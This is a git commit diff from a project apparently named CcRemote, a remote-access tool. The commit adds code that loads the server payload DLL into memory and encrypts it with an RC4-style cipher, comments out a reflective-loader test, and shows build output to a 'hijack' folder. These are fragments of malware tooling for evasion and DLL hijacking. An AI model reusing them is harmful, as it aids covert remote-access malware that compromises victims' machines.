update load dll

2025-07-29 21:54:26 +00:00 · 2020-10-11 18:45:20 +08:00
parent 4f572819b5
commit 479fe0ea1d
14 changed files with 167 additions and 30 deletions
--- a/CcMainDll/.vs/CcMainDll/v15/.suo
+++ b/CcMainDll/.vs/CcMainDll/v15/.suo
--- a/CcMainDll/.vs/CcMainDll/v15/Solution.VC.db-shm
+++ b/CcMainDll/.vs/CcMainDll/v15/Solution.VC.db-shm
--- a/CcMainDll/.vs/CcMainDll/v15/Solution.VC.db-wal
+++ b/CcMainDll/.vs/CcMainDll/v15/Solution.VC.db-wal
--- a/CcMainDll/CcMainDll/dllmain.cpp
+++ b/CcMainDll/CcMainDll/dllmain.cpp
@@ -239,18 +239,13 @@ extern "C" __declspec(dllexport) void TestFun()
 }


-
+/* test asm
 FILE * pFile;
-
 long lSize;
-
 char * buffer;
-
 size_t result;
 extern "C" __declspec(dllexport) bool InitTestReflectiveLoader()
 {
-
-
 		// 一个不漏地读入整个文件，只能采用二进制方式打开

 		pFile = fopen(".\\..\\..\\bin\\server\\CcMainDll.dll", "rb");
@@ -267,8 +262,6 @@ extern "C" __declspec(dllexport) bool InitTestReflectiveLoader()

 		}

-
-
 		// 获取文件大小 

 		fseek(pFile, 0, SEEK_END);
@@ -276,9 +269,6 @@ extern "C" __declspec(dllexport) bool InitTestReflectiveLoader()
 		lSize = ftell(pFile);

 		rewind(pFile);
-
-
-
 		// 分配内存存储整个文件

 		buffer = (char*)malloc(sizeof(char)*lSize);
@@ -294,9 +284,6 @@ extern "C" __declspec(dllexport) bool InitTestReflectiveLoader()
 			return false;

 		}
-
-
-
 		// 将文件拷贝到buffer中 

 		result = fread(buffer, 1, lSize, pFile);
@@ -313,10 +300,8 @@ extern "C" __declspec(dllexport) bool InitTestReflectiveLoader()

 		}
 		return true;
-
 }
-
-
+*/

 inline DWORD GetCurrentPositionAddress()
 {
--- a/CcMainDll/wsc/Release/wsc.log
+++ b/CcMainDll/wsc/Release/wsc.log
@@ -1,7 +1,16 @@
-  pch.cpp
+G:\VS2017\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。  此生成实例将添加斜杠，因为必须有这个斜杠才能正确计算 Output 目录。
+  pch.cpp
  dllmain.cpp
-    正在创建库 F:\myapp\CcRemote\CcMainDll\Release\wsc.lib 和对象 F:\myapp\CcRemote\CcMainDll\Release\wsc.exp
+g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(9): warning C4018: “<=”: 有符号/无符号不匹配
+g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(11): warning C4267: “=”: 从“size_t”转换到“char”，可能丢失数据
+g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(62): warning C4838: 从“int”转换到“char”需要收缩转换
+g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(62): warning C4309: “初始化”: 截断常量值
+g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(63): warning C4838: 从“int”转换到“char”需要收缩转换
+g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(63): warning C4309: “初始化”: 截断常量值
+g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(64): warning C4838: 从“int”转换到“char”需要收缩转换
+g:\ccremote\ccremote\ccmaindll\wsc\dllmain.cpp(64): warning C4309: “初始化”: 截断常量值
+    正在创建库 ..\..\bin\hijack\wsc.lib 和对象 ..\..\bin\hijack\wsc.exp
  正在生成代码
-  All 6 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+  All 8 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
  已完成代码的生成
-  wsc.vcxproj -> F:\myapp\CcRemote\CcMainDll\Release\wsc.dll
+  wsc.vcxproj -> G:\CcRemote\CcRemote\CcMainDll\wsc\..\..\bin\hijack\wsc.dll
--- a/CcMainDll/wsc/Release/wsc.tlog/wsc.lastbuildstate
+++ b/CcMainDll/wsc/Release/wsc.tlog/wsc.lastbuildstate
@@ -1,2 +1,2 @@
 #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0
-Release|Win32|F:\myapp\CcRemote\CcMainDll\|
+Release|Win32|G:\CcRemote\CcRemote\CcMainDll\|
--- a/bin/hijack/wsc.dll
+++ b/bin/hijack/wsc.dll
--- a/bin/hijack/wsc.lib
+++ b/bin/hijack/wsc.lib
--- a/strCodeTest/.vs/strCodeTest/v15/.suo
+++ b/strCodeTest/.vs/strCodeTest/v15/.suo
--- a/strCodeTest/Debug/strCodeTest.exe
+++ b/strCodeTest/Debug/strCodeTest.exe
--- a/strCodeTest/strCodeTest/Debug/strCodeTest.log
+++ b/strCodeTest/strCodeTest/Debug/strCodeTest.log
@@ -1,6 +1,9 @@
  strCodeTest.cpp
-f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(13): warning C4018: “<=”: 有符号/无符号不匹配
-f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(15): warning C4267: “=”: 从“size_t”转换到“char”，可能丢失数据
-f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(27): warning C4018: “<=”: 有符号/无符号不匹配
-f:\myapp\ccremote\strcodetest\strcodetest\strcodetest.cpp(29): warning C4267: “=”: 从“size_t”转换到“char”，可能丢失数据
-  strCodeTest.vcxproj -> F:\myapp\CcRemote\strCodeTest\Debug\strCodeTest.exe
+g:\ccremote\ccremote\strcodetest\strcodetest\strcodetest.cpp(18): warning C4018: “<=”: 有符号/无符号不匹配
+g:\ccremote\ccremote\strcodetest\strcodetest\strcodetest.cpp(20): warning C4267: “=”: 从“size_t”转换到“char”，可能丢失数据
+g:\ccremote\ccremote\strcodetest\strcodetest\strcodetest.cpp(32): warning C4018: “<=”: 有符号/无符号不匹配
+g:\ccremote\ccremote\strcodetest\strcodetest\strcodetest.cpp(34): warning C4267: “=”: 从“size_t”转换到“char”，可能丢失数据
+g:\ccremote\ccremote\strcodetest\strcodetest\strcodetest.cpp(53): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
+  g:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明
+g:\ccremote\ccremote\strcodetest\strcodetest\strcodetest.cpp(119): warning C4244: “参数”: 从“time_t”转换到“unsigned int”，可能丢失数据
+  strCodeTest.vcxproj -> G:\CcRemote\CcRemote\strCodeTest\Debug\strCodeTest.exe
--- a/strCodeTest/strCodeTest/Debug/strCodeTest.tlog/strCodeTest.lastbuildstate
+++ b/strCodeTest/strCodeTest/Debug/strCodeTest.tlog/strCodeTest.lastbuildstate
@@ -1,2 +1,2 @@
 #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0
-Debug|Win32|F:\myapp\CcRemote\strCodeTest\|
+Debug|Win32|G:\CcRemote\CcRemote\strCodeTest\|
--- a/strCodeTest/strCodeTest/strCodeTest.cpp
+++ b/strCodeTest/strCodeTest/strCodeTest.cpp
@@ -2,6 +2,11 @@
 //

 #include <iostream>
+#include <windows.h>
+#include <time.h>
+
+#define SIZE 256
+

 char* crycode(char* str)
 {
@@ -37,8 +42,143 @@ char* uncode(char* str)



+
+FILE * pFile;
+long lSize;
+unsigned char * buffer;
+size_t result;
+bool LoaderFile()
+{
+		// 一个不漏地读入整个文件，只能采用二进制方式打开
+		pFile = fopen(".\\..\\..\\bin\\server\\CcMainDll.dll", "rb");
+
+		if (pFile == NULL)
+		{
+			fputs("File error", stderr);
+			printf("open file fail");
+			return false;
+		}
+
+		// 获取文件大小
+		fseek(pFile, 0, SEEK_END);
+		lSize = ftell(pFile);
+		rewind(pFile);
+		// 分配内存存储整个文件
+		buffer = (unsigned char*)malloc(sizeof(char)*lSize);
+
+		if (buffer == NULL)
+		{
+			fputs("Memory error", stderr);
+			printf("Memory alloc falil");
+			return false;
+
+		}
+		// 将文件拷贝到buffer中
+		result = fread(buffer, 1, lSize, pFile);
+		if (result != lSize)
+		{
+			fputs("Reading error", stderr);
+			printf("Load file to memory falil");
+			return false;
+		}
+		return true;
+}
+
+
+
+//------------------------------------------------------------
+//加密前的密码表
+// Size    : 256 (0x100)
+//------------------------------------------------------------
+unsigned char EncryptTable[256] = {0};
+
+//------------------------------------------------------------
+//加密后的密码表，可用于解密时的校验
+// Size    : 256 (0x100)
+//------------------------------------------------------------
+unsigned char ChcekTable[256] = {0};
+
+
+static inline void Swap(unsigned char *a, unsigned char *b) {
+	// 如果它们恰好是数组中的相同元素，不要交换它们，否则它会被归零
+	if (a != b) {
+		*a ^= *b;
+		*b ^= *a;
+		*a ^= *b;
+	}
+}
+
+int InitEncryptTable(void)
+{
+	int i;
+	// 用顺序递增的数字初始化数组
+	for (i = 0; i < SIZE; ++i)
+		EncryptTable[i] = i;
+
+	// 初始化随机种子
+	srand(time(NULL));
+
+	// 将数组中的每个元素与另一个随机元素交换
+	for (i = 0; i < SIZE; ++i)
+		Swap(&EncryptTable[i], &EncryptTable[rand() % SIZE]);
+
+	return 0;
+}
+//-------------加密函数-------------
+//参数说明：参数1：被加密数组，参数2：密码表数组，参数三：加密长度
+//备注：使用unsigned 为了防止异或结果错误。作为测试只加密前0x200字节
+//返回值与：无 对参数影响：无
+//-------------异或加密-------------
+void EncryptFunc(unsigned char *SourceBytes, unsigned char *EncryptBytes, DWORD nLength)
+{
+	DWORD nOffsetNum = 0, nTargetNum = 0, nLastNum = 0;
+	unsigned char TargetCode = '\x0', OffsetCode = '\x0', LastCode = '\x0';
+	for (DWORD i = 0; i < nLength; i++)
+	{
+		//取密码表标志位Code
+		TargetCode = EncryptBytes[((i + 1) % 0x100)];
+		//取偏移Code的偏移
+		nOffsetNum = (TargetCode + nOffsetNum) % 0x100;
+		//取密码表偏移Code
+		OffsetCode = EncryptBytes[nOffsetNum];
+		//交换密码表数值
+		EncryptBytes[nOffsetNum % 0x100] = EncryptBytes[((i + 1) % 0x100)];
+		EncryptBytes[((i + 1) % 0x100)] = OffsetCode;
+		//取最终加密Code偏移
+		nLastNum = (TargetCode + OffsetCode) % 0x100;
+		//获取异或用的字符串
+		LastCode = EncryptBytes[nLastNum];
+		//取被加密的字符,异或
+		SourceBytes[i] ^= LastCode;
+	}
+	//在此下断观察SourceBytes和CryptData
+	return;
+}
+
+
+
+int RC4Test()
+{
+	//加密
+	DWORD nLength = 0;
+	//nLength = sizeof(SourceData);
+	//加密后EncryptTable会变成ChcekTable，由于加密解密使用的Key一样，因此解密时判断CheckTable一致即可
+	memcpy(ChcekTable, EncryptTable, 0x100);
+	EncryptFunc(buffer, EncryptTable, result);
+	//解密
+	EncryptFunc(buffer, ChcekTable, result);
+
+
+	return 0;
+}
 int main()
 {
+	InitEncryptTable();
+	if (LoaderFile())
+	{
+		RC4Test();
+	}
+	
 	char a[] = "kernel32";
 	char b[] = "GetModuleFileNameA";
 	char c[] = "\\Cc28256.dat";
--- a/strCodeTest/strCodeTest/strCodeTest.vcxproj
+++ b/strCodeTest/strCodeTest/strCodeTest.vcxproj
@@ -88,7 +88,7 @@
      </PrecompiledHeader>
      <WarningLevel>Level3</WarningLevel>
      <Optimization>Disabled</Optimization>
-      <SDLCheck>true</SDLCheck>
+      <SDLCheck>false</SDLCheck>
      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
    </ClCompile>
@@ -120,7 +120,7 @@
      <Optimization>MaxSpeed</Optimization>
      <FunctionLevelLinking>true</FunctionLevelLinking>
      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <SDLCheck>true</SDLCheck>
+      <SDLCheck>false</SDLCheck>
      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
      <ConformanceMode>true</ConformanceMode>
    </ClCompile>